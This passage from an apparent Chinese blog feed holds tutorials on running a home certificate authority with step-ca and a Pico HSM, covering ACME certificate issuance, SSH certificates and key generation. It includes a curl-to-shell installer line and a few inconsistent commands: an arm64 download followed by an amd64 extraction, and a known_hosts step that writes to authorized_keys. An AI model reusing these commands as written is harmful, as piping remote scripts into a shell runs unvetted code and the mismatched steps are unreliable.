class="punctuation">{</span></span><br><span class="line"> <span class="attr">"templateFile"</span><span class="punctuation">:</span> <span class="string">"/etc/step-ca/templates/x509/leaf.tpl"</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"ssh"</span><span class="punctuation">:</span> <span class="punctuation">{</span><span class="punctuation">}</span></span><br><span class="line"> <span class="punctuation">}</span></span><br><span class="line">......</span><br><span class="line"> <span class="attr">"claims"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"enableSSHCA"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"disableRenewal"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"allowRenewalAfterExpiry"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"disableSmallstepExtensions"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"options"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"x509"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"templateFile"</span><span class="punctuation">:</span> <span class="string">"/etc/step-ca/templates/x509/leaf.tpl"</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"ssh"</span><span class="punctuation">:</span> <span class="punctuation">{</span><span class="punctuation">}</span></span><br><span class="line"> <span class="punctuation">}</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="给设备发SSL证书"><a href="#给设备发SSL证书" class="headerlink" title="给设备发SSL证书"></a>给设备发SSL证书</h4><p>其他ACME客户端可以参考:<a href="https://smallstep.com/docs/tutorials/acme-protocol-acme-clients/#popular-acme-clients">Popular ACME Clients</a><br>这里我们使用<a href="https://github.com/acmesh-official/acme.sh">acme.sh</a>,主打一个小而美。 </p><p>假设我要给我内网的旁路由(OpenWRT)签一个证书 </p><p>由于我们的自建CA不在系统的信任根证书列表里,所以如果直接运行acme.sh,curl会报错,我们需要把root_ca.crt复制一份到设备上。 </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 将root_ca.crt复制到/root/certs/root_ca.crt</span></span><br><span class="line"><span class="comment"># 安装acme.sh</span></span><br><span class="line">$ curl https://get.acme.sh | sh -s email=my@example.com</span><br><span class="line"></span><br><span class="line">$ ~/.acme.sh/acme.sh --issue -d router2.d9lab.eu.org \</span><br><span class="line">--server https://ca.lab.thinkalone.win:4443/acme/acme/directory \</span><br><span class="line">--ca-bundle /root/certs/root_ca.crt \</span><br><span class="line">--webroot /www --days 6 --reloadcmd <span class="string">"service uhttpd reload"</span></span><br></pre></td></tr></table></figure><p>然后编辑<code>/etc/config/uhttpd</code></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line"><span class="comment">#让uhttpd监听443端口</span></span><br><span class="line"> list listen_https <span class="string">'0.0.0.0:443'</span></span><br><span class="line"> list listen_https <span class="string">'[::]:443'</span></span><br><span class="line">...</span><br><span class="line"><span class="comment">#将cert和key的路径改到上面acme.sh脚本输出的</span></span><br><span class="line"> option cert <span class="string">'/root/.acme.sh/router2.d9lab.eu.org_ecc/router2.d9lab.eu.org.cer'</span></span><br><span class="line"> option key <span class="string">'/root/.acme.sh/router2.d9lab.eu.org_ecc/router2.d9lab.eu.org.key'</span></span><br><span class="line">...</span><br></pre></td></tr></table></figure><h3 id="SSH"><a href="#SSH" class="headerlink" title="SSH"></a>SSH</h3><p>参考:<br><a href="https://www.whatsdoom.com/posts/2020/02/29/ssh-certificates-with-step-ca/">SSH Certificates with step-ca</a><br><a href="https://zenn.dev/mnod/articles/15d4e93a9d44fc">step-ca で ssh証明書を扱う</a> </p><h4 id="Server"><a href="#Server" class="headerlink" title="Server"></a>Server</h4><p>重启 <code>step-ca</code> ,查看日志找到 <code>SSH Host CA Key</code> 和 <code>SSH User CA Key</code> </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> service step-ca stop</span><br><span class="line">$ <span class="built_in">sudo</span> service step-ca start</span><br><span class="line">$ <span class="built_in">sudo</span> service step-ca status</span><br><span class="line">● step-ca.service - step-ca</span><br><span class="line"> Loaded: loaded (/etc/systemd/system/step-ca.service; enabled; preset: enabled)</span><br><span class="line"> Active: active (running) since </span><br><span class="line"> Main PID: 156738 (sh)</span><br><span class="line"> Tasks: 11 (<span class="built_in">limit</span>: 4529)</span><br><span class="line"> Memory: 14.4M</span><br><span class="line"> CPU: 305ms</span><br><span class="line"> CGroup: /system.slice/step-ca.service</span><br><span class="line"> ├─156738 /bin/sh -c <span class="string">"/usr/local/bin/step-ca /etc/step-ca/config/ca.json"</span></span><br><span class="line"> └─156739 /usr/local/bin/step-ca /etc/step-ca/config/ca.json</span><br><span class="line"></span><br><span class="line">......</span><br><span class="line">SSH Host CA Key: ecdsa-sha2-nistp256 AAA=</span><br><span class="line">SSH User CA Key: ecdsa-sha2-nistp256 AAB=</span><br><span class="line">......</span><br></pre></td></tr></table></figure><p>将 <code>SSH User CA Key</code> 写入到 <code>/etc/ssh/ssh_user_ca_key.pub</code> </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">echo</span> <span class="string">"ecdsa-sha2-nistp256 AAB="</span> > /etc/ssh/ssh_user_ca_key.pub</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">chown</span> root:root /etc/ssh/ssh_user_ca_key.pub</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">chmod</span> 644 /etc/ssh/ssh_user_ca_key.pub</span><br></pre></td></tr></table></figure><p>签名主机公钥 </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">cp</span> /etc/ssh/ssh_host_ecdsa_key.pub ssh_host_ecdsa_key.pub</span><br><span class="line">$ <span class="built_in">sudo</span> step ssh certificate <span class="variable">$HOSTNAME</span> ssh_host_ecdsa_key.pub --host --sign</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">cp</span> ssh_host_ecdsa_key-cert.pub /etc/ssh/ssh_host_ecdsa_key-cert.pub</span><br></pre></td></tr></table></figure><p>创建 <code>/etc/ssh/sshd_config.d/ca.conf</code> </p><figure class="highlight plaintext"><figcaption><span>ca.conf</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">TrustedUserCAKeys /etc/ssh/ssh_user_ca_key.pub</span><br><span class="line">HostCertificate /etc/ssh/ssh_host_ecdsa_key-cert.pub</span><br></pre></td></tr></table></figure><p>测试 <code>sshd</code> 配置并重启 <code>sshd</code> </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> sshd -t</span><br><span class="line">$ <span class="built_in">sudo</span> service ssh restart</span><br></pre></td></tr></table></figure><p>将 <code>SSH Host CA Key</code> 写入到 <code>~/.ssh/authorized_keys</code> </p><figure class="highlight plaintext"><figcaption><span>authorized_keys</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ecdsa-sha2-nistp256 AAA=</span><br></pre></td></tr></table></figure><h4 id="Client"><a href="#Client" class="headerlink" title="Client"></a>Client</h4><p>生成用于连接的证书 </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ step ssh certificate disappear9@192.168.1.100 id_ecdsa</span><br><span class="line">......</span><br><span class="line">Please enter the password to encrypt the private key:</span><br><span class="line"> Private Key: id_ecdsa</span><br><span class="line"> Public Key: id_ecdsa.pub</span><br><span class="line"> Certificate: id_ecdsa-cert.pub</span><br></pre></td></tr></table></figure><p>将 <code>SSH Host CA Key</code> 写入到 <code>~/.ssh/known_hosts</code> </p><figure class="highlight plaintext"><figcaption><span>authorized_keys</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo "@cert-authority 192.168.1.100 ecdsa-sha2-nistp256 AAA=" >> ~/.ssh/authorized_keys</span><br></pre></td></tr></table></figure><p>然后就可以直接 <code>ssh disappear9@192.168.1.100</code> 连接了 </p><p>(完)</p>]]></content>
<summary type="html"><p>前几天总算抽空把咕了快一年的自建灵车CA的教程写完了:<a href="https://thinkalone.win/build-ca-with-picohsm.html">使用 Pico HSM 和 step-ca 自建一个CA</a><br>建完以后总是要拿来用一用玩一玩的,那么这一篇幅就写一些 Step-CA 的使用教程吧,顺便也给自己留个参考。 </p>
<hr></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>灵上加灵:使用 Pico HSM 和 step-ca 自建一个CA</title>
<link href="https://thinkalone.win/build-ca-with-picohsm.html"/>
<id>https://thinkalone.win/build-ca-with-picohsm.html</id>
<published>2025-12-10T04:00:00.000Z</published>
<updated>2026-01-15T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h3 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h3><p>前几天在Canokey群看到一个软件:<a href="https://github.com/smallstep/certificates">step-ca</a><br>简单说就是用这个软件可以自建一个CA来玩,而且软件支持HSM设备</p><hr><h3 id="环境确认"><a href="#环境确认" class="headerlink" title="环境确认"></a>环境确认</h3><p>硬件信息:<br>  OrangePi Zero3<br>  Raspberry Pi Pico2<br>操作系统:<br>  Armbian v25.11.2 6.12.58-current-sunxi64<br>软件版本:<br>  go1.25.5<br>  step-ca 0.29.0<br>  OpenSC 0.26.1 </p><span id="more"></span> <h3 id="准备"><a href="#准备" class="headerlink" title="准备"></a>准备</h3><h4 id="安装Go"><a href="#安装Go" class="headerlink" title="安装Go"></a>安装Go</h4><p><a href="https://go.dev/doc/install">https://go.dev/doc/install</a></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ wget https://go.dev/dl/go1.25.5.linux-arm64.tar.gz</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">rm</span> -rf /usr/local/go && <span class="built_in">sudo</span> tar -C /usr/local -xzf go1.25.5.linux-amd64.tar.gz</span><br><span class="line">$ <span class="built_in">export</span> PATH=<span class="variable">$PATH</span>:/usr/local/go/bin</span><br><span class="line">$ go version</span><br><span class="line">go version go1.25.5 linux/arm64</span><br></pre></td></tr></table></figure><h4 id="编译-step-ca"><a href="#编译-step-ca" class="headerlink" title="编译 step-ca"></a>编译 step-ca</h4><p>由于官方编译的软件包没有HSM支持,所以我们需要手动编译 </p><p><a href="https://github.com/smallstep/certificates/blob/master/CONTRIBUTING.md#build-step-ca-using-cgo">https://github.com/smallstep/certificates/blob/master/CONTRIBUTING.md#build-step-ca-using-cgo</a> </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$ wget https://github.com/smallstep/certificates/archive/refs/tags/v0.29.0.tar.gz</span><br><span class="line">$ tar -xvzf v0.29.0.tar.gz</span><br><span class="line">$ <span class="built_in">cd</span> certificates-0.29.0</span><br><span class="line">$ <span class="built_in">sudo</span> apt install libpcsclite-dev gcc make pkg-config</span><br><span class="line">$ make bootstrap</span><br><span class="line">$ make build GO_ENVS=<span class="string">"CGO_ENABLED=1"</span></span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">cp</span> bin/step-ca /usr/local/bin</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">setcap</span> CAP_NET_BIND_SERVICE=+eip /usr/local/bin/step-ca</span><br><span class="line">$ step-ca version</span><br><span class="line">Smallstep CA/ (linux/arm64)</span><br><span class="line">Release Date: 2025-12-03 14:16 UTC</span><br></pre></td></tr></table></figure><h4 id="安装-step-cli-和-step-kms-plugin"><a href="#安装-step-cli-和-step-kms-plugin" class="headerlink" title="安装 step-cli 和 step-kms-plugin"></a>安装 step-cli 和 step-kms-plugin</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ wget https://dl.smallstep.com/gh-release/cli/gh-release-header/v0.29.0/step-cli_0.29.0-1_arm64.deb</span><br><span class="line">$ <span class="built_in">sudo</span> dpkg -i step-cli_0.29.0-1_arm64.deb</span><br><span class="line">$ step version</span><br><span class="line">Smallstep CLI/0.29.0 (linux/arm64)</span><br><span class="line">Release Date: 2025-12-03T04:11:27Z</span><br><span class="line">$ wget https://github.com/smallstep/step-kms-plugin/releases/download/v0.16.0/step-kms-plugin_0.16.0-1_arm64.deb</span><br><span class="line">$ <span class="built_in">sudo</span> dpkg -i step-kms-plugin_0.16.0-1_arm64.deb</span><br><span class="line">$ step kms version</span><br><span class="line">🔐 step-kms-plugin/0.16.0 (linux/arm64)</span><br><span class="line"> Release Date: 2025-12-04T22:35:43Z</span><br></pre></td></tr></table></figure><h4 id="编译-OpenSC"><a href="#编译-OpenSC" class="headerlink" title="编译 OpenSC"></a>编译 OpenSC</h4><p><a href="https://github.com/OpenSC/OpenSC/wiki/Compiling-and-Installing-on-Unix-flavors">https://github.com/OpenSC/OpenSC/wiki/Compiling-and-Installing-on-Unix-flavors</a> </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ wget https://github.com/OpenSC/OpenSC/releases/download/0.26.1/opensc-0.26.1.tar.gz</span><br><span class="line">$ <span class="built_in">sudo</span> apt install pcscd libccid libpcsclite-dev libssl-dev libreadline-dev autoconf automake build-essential docbook-xsl xsltproc libtool pkg-config zlib1g-dev </span><br><span class="line">$ tar xfvz opensc-0.26.1.tar.gz</span><br><span class="line">$ <span class="built_in">cd</span> opensc-0.26.1</span><br><span class="line">$ ./bootstrap</span><br><span class="line">$ ./configure --prefix=/usr --sysconfdir=/etc/opensc</span><br><span class="line">$ make</span><br><span class="line">$ <span class="built_in">sudo</span> make install</span><br></pre></td></tr></table></figure><h4 id="配置-TRNG-(可选)"><a href="#配置-TRNG-(可选)" class="headerlink" title="配置 TRNG (可选)"></a>配置 TRNG (可选)</h4><p>这里使用的是 <a href="https://github.com/leetronics/infnoise">Infinite Noise TRNG</a> 全开源的硬件TRNG</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$ curl -LO https://github.com/leetronics/infnoise/archive/refs/tags/0.3.3.tar.gz</span><br><span class="line">$ tar xvzf 0.3.3.tar.gz</span><br><span class="line">$ <span class="built_in">cd</span> infnoise-0.3.3/software</span><br><span class="line">$ <span class="built_in">sudo</span> apt install libftdi-dev libusb-dev</span><br><span class="line">$ make -f Makefile.linux</span><br><span class="line">$ <span class="built_in">sudo</span> make -f Makefile.linux install</span><br><span class="line">$ infnoise --version</span><br><span class="line">GIT VERSION -</span><br><span class="line">GIT COMMIT -</span><br><span class="line">GIT DATE -</span><br><span class="line"></span><br><span class="line">$ <span class="built_in">sudo</span> init 6</span><br><span class="line">$ infnoise --debug --no-output</span><br><span class="line">Generated 1048576 bits. OK to use data. Estimated entropy per bit: 0.875965, estimated K: 1.835235</span><br><span class="line">num1s:50.019069%, even misfires:0.183222%, odd misfires:0.123520%</span><br><span class="line">Generated 2097152 bits. OK to use data. Estimated entropy per bit: 0.873196, estimated K: 1.831716</span><br><span class="line">num1s:49.909786%, even misfires:0.202971%, odd misfires:0.124232%</span><br><span class="line">......</span><br></pre></td></tr></table></figure><h4 id="烧录-pico-hsm-到-Pico2"><a href="#烧录-pico-hsm-到-Pico2" class="headerlink" title="烧录 pico-hsm 到 Pico2"></a>烧录 pico-hsm 到 Pico2</h4><p><a href="https://github.com/polhenarejos/pico-hsm">https://github.com/polhenarejos/pico-hsm</a><br><a href="https://github.com/Gadgetoid/pico-universal-flash-nuke">https://github.com/Gadgetoid/pico-universal-flash-nuke</a> </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ wget https://github.com/polhenarejos/pico-hsm/releases/download/v6.0/pico_hsm_pico2-6.0.uf2</span><br><span class="line">$ wget https://github.com/Gadgetoid/pico-universal-flash-nuke/releases/download/v1.0.1/universal_flash_nuke.uf2</span><br></pre></td></tr></table></figure><p>按住 Pico2 开发板上的 BOOT 按钮,连上 USB 线,先刷入<code>universal_flash_nuke.uf2</code>清空Flash,再刷入<code>pico_hsm_pico2-6.0.uf2</code></p><h4 id="初始化-pico-hsm"><a href="#初始化-pico-hsm" class="headerlink" title="初始化 pico-hsm"></a>初始化 pico-hsm</h4><p><del>更新:目前如果要使用SCS3 tool导入证书,只能使用Pico Commissioner初始化,否则会导致SCS3一直报认证错误。</del><br>更新2:这B作者把Pico Commissioner的页面和pypicohsm等工具全删了,现有的网页存档也被作者下了,然后强制用户使用一个新的需要付费30欧元每个Key的应用来初始化。<br>更新3:有个印度老哥做了分叉<a href="https://github.com/librekeys">Libre Keys</a>,大部分工具如pypicohsm等都可以在这里下载了。<br>更新4:写了一个<a href="https://github.com/Disappear9/pico-hsm-cvcgen/blob/main/research/README_ZH.MD">自己生成cvc证书的教程</a>,按教程操作后就可以用SCS3管理pico-hsm了,直接使用原<code>2.0.2</code>版本的<code>pypicohsm</code>会从原作者的服务器上请求cvc证书,也能用,但是鉴于这B目前的吃相这个API还能活多久我不好说。 </p><div class="tabs my-3 is-fullwidth"> <ul class="mx-0 my-0"> <li class="is-active"> <a href="#init-pico-hsm-py"> <p>pico-hsm-tool.py</p> </a> </li><li> <a href="#init-pico-hsm-commissioner"> <p>PicoCommissioner(已失效)</p> </a> </li> </ul> </div> <div id="init-pico-hsm-py" class="tab-content"> <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> apt install python3-dev</span><br><span class="line">$ wget https://github.com/librekeys/pico-hsm/raw/refs/heads/master/tools/pico-hsm-tool.py</span><br><span class="line">$ python3 -m venv venv</span><br><span class="line">$ <span class="built_in">source</span> venv/bin/activate</span><br><span class="line">$ pip install pycvc cryptography pypicohsm</span><br><span class="line">$ python3 pico-hsm-tool.py</span><br><span class="line">$ deactivate</span><br></pre></td></tr></table></figure><p>更改pico-hsm的vid和pid </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> -i</span><br><span class="line">$ <span class="built_in">source</span> venv/bin/activate</span><br><span class="line">$ python pico-hsm-tool.py phy vidpid 20A0:4230</span><br><span class="line">$ <span class="built_in">exit</span></span><br><span class="line">$ lsusb</span><br><span class="line">Bus 006 Device 003: ID 20a0:4230 Clay Logic Nitrokey HSM</span><br><span class="line">Bus 006 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub</span><br><span class="line">Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>初始化 pico-hsm </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ python3 pico-hsm-tool.py --pin 648219 initialize --so-pin 57621880</span><br></pre></td></tr></table></figure> </div><div id="init-pico-hsm-commissioner" class="tab-content is-hidden"> <p><a href="https://www.picokeys.com/pico-commissioner/">https://www.picokeys.com/pico-commissioner/</a><br><img src="/pictures/pico-hsm/pico-commissioner.png" alt="pico-commissioner"> </p> </div><h3 id="创建RootCA和中间CA"><a href="#创建RootCA和中间CA" class="headerlink" title="创建RootCA和中间CA"></a>创建RootCA和中间CA</h3><p>这里我们使用的是创建后导入的方式,虽然在使用正规HSM产品的时候都是建议仅在设备上生成密钥且不要导入导出,但是我们这个10块钱的开发板指不定什么时候就会坏,所以多一份备份是必须的。 </p><p>生成RootCA私钥 </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">mkdir</span> -p certificate-authority/newcerts</span><br><span class="line">$ <span class="built_in">touch</span> certificate-authority/index.txt</span><br><span class="line">$ openssl ecparam -genkey -name secp384r1 -noout -out root-ca-key.pem</span><br></pre></td></tr></table></figure><figure class="highlight ini"><figcaption><span>create_root_cert.ini</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[ ca ]</span></span><br><span class="line"><span class="comment"># `man ca`</span></span><br><span class="line"><span class="attr">default_ca</span> = CA_default</span><br><span class="line"></span><br><span class="line"><span class="section">[ CA_default ]</span></span><br><span class="line"><span class="comment"># Directory and file locations.</span></span><br><span class="line"><span class="attr">dir</span> = certificate-authority</span><br><span class="line"><span class="attr">certs</span> = <span class="variable">$dir</span>/certs</span><br><span class="line"><span class="attr">crl_dir</span> = <span class="variable">$dir</span>/crl</span><br><span class="line"><span class="attr">new_certs_dir</span> = <span class="variable">$dir</span>/newcerts</span><br><span class="line"><span class="attr">database</span> = <span class="variable">$dir</span>/index.txt</span><br><span class="line"><span class="attr">serial</span> = <span class="variable">$dir</span>/serial</span><br><span class="line"></span><br><span class="line"><span class="comment"># SHA-1 is deprecated, so use SHA-2 instead.</span></span><br><span class="line"><span class="attr">default_md</span> = sha512</span><br><span class="line"></span><br><span class="line"><span class="attr">name_opt</span> = ca_default</span><br><span class="line"><span class="attr">cert_opt</span> = ca_default</span><br><span class="line"><span class="attr">default_days</span> = <span class="number">375</span></span><br><span class="line"><span class="attr">preserve</span> = <span class="literal">no</span></span><br><span class="line"><span class="attr">policy</span> = policy_strict</span><br><span class="line"></span><br><span class="line"><span class="section">[ policy_strict ]</span></span><br><span class="line"><span class="comment"># The root CA should only sign intermediate certificates that match.</span></span><br><span class="line"><span class="comment"># See the POLICY FORMAT section of `man ca`.</span></span><br><span class="line"><span class="attr">countryName</span> = match</span><br><span class="line"><span class="attr">stateOrProvinceName</span> = match</span><br><span class="line"><span class="attr">organizationName</span> = match</span><br><span class="line"><span class="attr">organizationalUnitName</span> = optional</span><br><span class="line"><span class="attr">commonName</span> = supplied</span><br><span class="line"><span class="attr">emailAddress</span> = optional</span><br><span class="line"></span><br><span class="line"><span class="section">[ req ]</span></span><br><span class="line"><span class="comment"># Options for the `req` tool (`man req`).</span></span><br><span class="line"><span class="attr">default_bits</span> = <span class="number">4096</span></span><br><span class="line"><span class="attr">distinguished_name</span> = req_distinguished_name</span><br><span class="line"><span class="attr">string_mask</span> = utf8only</span><br><span class="line"><span class="attr">prompt</span> = <span class="literal">no</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># SHA-1 is deprecated, so use SHA-2 instead.</span></span><br><span class="line"><span class="attr">default_md</span> = sha512</span><br><span class="line"></span><br><span class="line"><span class="section">[ req_distinguished_name ]</span></span><br><span class="line"><span class="attr">C</span> = CN</span><br><span class="line"><span class="attr">O</span> = D9Lab</span><br><span class="line"><span class="attr">OU</span> = D9Lab Zero Certificate Authority</span><br><span class="line"><span class="attr">CN</span> = D9Lab Zero Root CA</span><br><span class="line"></span><br><span class="line"><span class="section">[ v3_ca ]</span></span><br><span class="line"><span class="comment"># Extensions for a typical CA (`man x509v3_config`).</span></span><br><span class="line"><span class="attr">subjectKeyIdentifier</span> = hash</span><br><span class="line"><span class="attr">authorityKeyIdentifier</span> = keyid:always,issuer</span><br><span class="line"><span class="attr">basicConstraints</span> = critical, CA:<span class="literal">true</span></span><br><span class="line"><span class="attr">keyUsage</span> = critical, digitalSignature, cRLSign, keyCertSign</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>生成RootCA证书 </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ openssl req -config create_root_cert.ini -new -key root-ca-key.pem -x509 -days 3650 -sha512 -extensions v3_ca -out root-ca.crt</span><br></pre></td></tr></table></figure><p>RootCA的密钥和证书如果有条件的话建议导入到不那么灵车的设备里,<a href="https://thinkalone.win/canokey-canary.html#PIV">如Canokey中。</a> </p><p>生成中间CA私钥 </p><div class="tabs my-3 is-fullwidth"> <ul class="mx-0 my-0"> <li class="is-active"> <a href="#intermediate-ca-hsm"> <p>使用HSM设备</p> </a> </li><li> <a href="#intermediate-ca-file"> <p>不使用HSM设备</p> </a> </li> </ul> </div> <div id="intermediate-ca-hsm" class="tab-content"> <p>首先暂时拔掉Pico HSM,插上Canokey/YubiKey之类的设备<br>将证书和私钥打包成<code>p12</code>格式 </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 注意必须要设定密码,不然导入的时候会报错! </span></span><br><span class="line">$ openssl pkcs12 -<span class="built_in">export</span> -out root-ca.p12 -inkey root-ca-key.pem -<span class="keyword">in</span> root-ca.crt</span><br></pre></td></tr></table></figure><p>将<code>p12</code>格式的RootCA证书导入到HSM设备中 以Canokey为例 </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ yubico-piv-tool -r canokeys -s 9a -i root-ca.p12 -KPKCS12 -a import-key -a import-cert</span><br></pre></td></tr></table></figure><p>找到导入进Canokey的证书id </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ 